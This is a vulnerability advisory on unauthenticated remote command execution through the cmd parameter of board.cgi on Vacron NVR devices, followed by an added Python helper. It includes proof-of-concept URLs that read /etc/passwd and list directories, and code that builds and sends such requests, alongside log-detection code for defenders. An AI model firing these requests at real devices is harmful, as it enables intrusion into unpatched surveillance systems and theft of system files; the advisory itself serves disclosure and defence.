SSD Advisory – Vacron NVR Remote Command Execution
The following advisory describes a remote command execution vulnerability found in Vacron NVR devices.
VACRON describes itself as specializing in “various types of mobile monitoring, CCTV monitoring system, IP remote image monitoring system monitoring and other related production, and can accept ODM, OEM and other customized orders, the main products: driving recorder, CCTV analog monitoring system, CMS, IP Cam, etc.”
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
We have been trying to contact Vacron since September 5, 2017; repeated attempts to establish contact went unanswered. At this time there is no vendor patch or workaround for the vulnerability.
User-controlled input is not sufficiently sanitized when passed to board.cgi.
board.cgi reads a cmd query parameter and executes its value as a system command without any validation. An unauthenticated attacker who can reach the device's web interface can therefore supply an arbitrary command in the cmd parameter and have it executed on the NVR, with the command output returned in the HTTP response.
Proof of Concept
http://IP/board.cgi?cmd=ifconfig
http://IP/board.cgi?cmd=cat+/etc/passwd
http://IP/board.cgi?cmd=ls+../../../
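The helper below is an added example and is not part of the advisory or the researcher's proof of concept. It does two things a practitioner would want around the URLs above: it builds the board.cgi request with the command properly URL-encoded (so shell metacharacters survive the URL layer), and it flags board.cgi?cmd= requests in access logs from a proxy or WAF placed in front of the NVR, which is the only detection available while no patch exists. The host name, the Common Log Format lines, and the /etc/passwd heuristic used to confirm execution are all assumptions made for the example; the advisory states only that cmd is executed as a command.

```python
"""Request builder and log detection for the Vacron NVR board.cgi ?cmd= issue.

Added example, not from the SSD advisory. Assumes only what the advisory
states: a GET to /board.cgi with a cmd query parameter runs the value as a
command. Host names, log lines and the passwd heuristic are constructed.
"""
import re
import urllib.request
from urllib.parse import parse_qs, urlencode, urlparse


def build_poc_url(host, command, scheme="http"):
    """Build the board.cgi request the advisory shows.

    urlencode() turns spaces into '+' and percent-encodes ';', '|', '&'
    and similar, so the whole command reaches the CGI intact; '/' is left
    raw so the result matches the advisory's example URLs.
    """
    return f"{scheme}://{host}/board.cgi?" + urlencode({"cmd": command}, safe="/")


def run_command(host, command, timeout=10):
    """Send the request and return the response body (network use; not
    invoked when the module is imported)."""
    with urllib.request.urlopen(build_poc_url(host, command), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# One /etc/passwd record: name:pw:uid:gid:gecos:home:shell (fields may be empty,
# as they often are on BusyBox-based devices). Assumed heuristic for confirming
# that 'cat /etc/passwd' really executed rather than returning an error page.
PASSWD_LINE = re.compile(r"^[^:\s]+:[^:]*:\d+:\d+:[^:]*:[^:]*:[^:\n]*$", re.M)


def looks_like_passwd(body):
    """True if the body contains at least one passwd-style record."""
    return bool(PASSWD_LINE.search(body))


# Defender side: spot exploitation attempts in access logs from a reverse
# proxy or WAF in front of the NVR. Assumes Common Log Format request lines.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def flag_board_cgi_requests(log_lines):
    """Return (client_ip, decoded_command) for every request to board.cgi
    that carries a cmd parameter; other board.cgi requests are ignored."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        url = urlparse(m.group("path"))
        if not url.path.endswith("/board.cgi"):
            continue
        params = parse_qs(url.query)  # decodes '+' and %XX back to the command
        if "cmd" in params:
            hits.append((line.split()[0], params["cmd"][0]))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Sep/2017:10:12:01 +0000] "GET /board.cgi?cmd=cat+/etc/passwd HTTP/1.1" 200 1187',
    '198.51.100.7 - - [05/Sep/2017:10:12:09 +0000] "GET /board.cgi?cmd=ifconfig HTTP/1.1" 200 610',
    '203.0.113.4 - - [05/Sep/2017:10:13:44 +0000] "GET /index.html HTTP/1.1" 200 2310',
    '203.0.113.4 - - [05/Sep/2017:10:13:45 +0000] "GET /board.cgi?page=1 HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    print(build_poc_url("192.0.2.10", "cat /etc/passwd"))
    for ip, cmd in flag_board_cgi_requests(SAMPLE_LOG):
        print(f"board.cgi command from {ip}: {cmd!r}")
```

`run_command()` is the only function that touches the network; everything else works offline, so the detection logic can be dropped into a log-review script as is. Because the device executes whatever string it receives, the encoded form matters: a raw `;` or `&` in the URL is interpreted by the HTTP layer, not the NVR's shell, which is why the builder encodes them.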